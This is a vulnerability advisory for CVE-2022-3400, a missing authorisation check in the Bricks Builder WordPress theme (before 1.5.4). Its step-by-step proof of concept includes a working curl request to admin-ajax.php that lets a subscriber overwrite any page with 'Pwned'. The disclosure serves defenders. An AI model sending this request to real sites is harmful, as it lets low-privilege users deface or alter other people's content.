Bricks Builder < 1.5.4 – Subscriber+ Arbitrary Post/Page Edition | CVE 2022-3400

Description

The theme does not have authorisation in an AJAX action, which could allow any authenticated users such as subscriber to call it and edit any page, post, or template on the blog

Proof of Concept

1. Start with a clean Wordpress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new Wordpress installations)
6. Send the following request to the server

curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Cookie: INSERT_COOKIES_HERE' \
--data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aijdog%22%2C%22name%22%3A%22text%2Dbasic%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22text%22%3A%22Pwned%22%7D%7D%5D'

7. The contents of the page should be replaced with a paragraph reading "Pwned"